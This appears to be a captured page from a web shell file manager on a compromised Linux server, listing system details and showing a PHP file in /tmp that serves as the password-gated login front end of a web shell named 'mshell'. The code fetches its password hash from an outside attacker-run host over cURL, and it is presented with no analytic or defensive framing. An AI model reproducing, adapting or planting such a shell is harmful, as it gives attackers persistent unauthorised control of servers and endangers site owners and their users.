HEX
Server: Apache
System: Linux www 6.18.27-i1-amd #1013 SMP Thu May 7 10:00:14 CEST 2026 x86_64
User: sws1073783838 (1073783838)
PHP: 8.3.30
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/shf_YlT0E1
<?php
session_start();

$passFile = 'http://wp-filemanager.com/mshell_cred.json';

// --- Загрузка содержимого через cURL ---
$ch = curl_init($passFile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$content = curl_exec($ch);

if (curl_errno($ch)) {
    die("Ошибка cURL: " . curl_error($ch));
}

$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($httpCode !== 200 || $content === false) {
    die("Файл не читается или URL недоступен: " . $passFile);
}

// --- Обработка JSON ---
$data = json_decode($content, true);
if ($data === null) {
    die("Ошибка разбора JSON: " . json_last_error_msg());
}

$storedHash = $data['pass'] ?? null;
if (!$storedHash) {
    die("Хеш пароля не найден в JSON.");
}

// --- Авторизация ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $inputPassword = $_POST['password'] ?? '';

    if ($storedHash && password_verify($inputPassword, $storedHash)) {
        $_SESSION['authenticated'] = true;
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } else {
        $error = "Неверный пароль.";
    }
}

// --- Выход ---
if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

// --- Форма входа ---
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true):
?>
<!DOCTYPE html>
<html>
<head>
    <title>mshell</title>
    <style>
        * { box-sizing: border-box; margin: 0; padding: 0; }
        body {
            background-color: #120d14;
            color: #faf0e6;
            font-family: 'JetBrains Mono', 'Courier New', Courier, monospace;
            font-size: 80%;
        }
        h2.header {
            font-size: 120%;
            background-color: #686a77;
            padding: 8px;
            color: #c3b1bd;
            text-align: center;
        }
        button {
            background-color: rgba(18, 138, 122, 0.78);
            height: 30px;
            color: #FFF8DC;
            margin-right: 10px;
            border-radius: 3px;
            border: none;
            padding: 6px 12px;
            font-family: 'JetBrains Mono', 'Courier New', Courier, monospace;
            font-size: 14px;
            cursor: pointer;
            display: flex;
            transition: all 0.15s ease;
        }
        button:hover {
            box-shadow: 0 2px 8px rgba(65, 65, 65, 0.7);
            background-color: rgba(138, 18, 48, 0.78);
        }
        input {
            margin: 8px 0;
            padding: 8px;
            width: 100%;
            background-color: #2d2d2d;
            border: 1px solid #444;
            color: #faf0e6;
        }
        form {
            background: #1e1e1e;
            padding: 20px;
            border-radius: 8px;
        }
        .login-wrapper {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
    </style>
</head>
<body>
    <h2 class="header"> m s h e l l</h2>
    <div class="login-wrapper">
        <form method="POST">
            <?php if (!empty($error)) echo "<p style='color: red;'>$error</p>"; ?>
            <input type="password" name="password" placeholder="Password" required autofocus>
            <button class="button-like" type="submit">Login</button>
        </form>
    </div>
</body>
</html>
<?php
    exit;
endif;
@ Telegram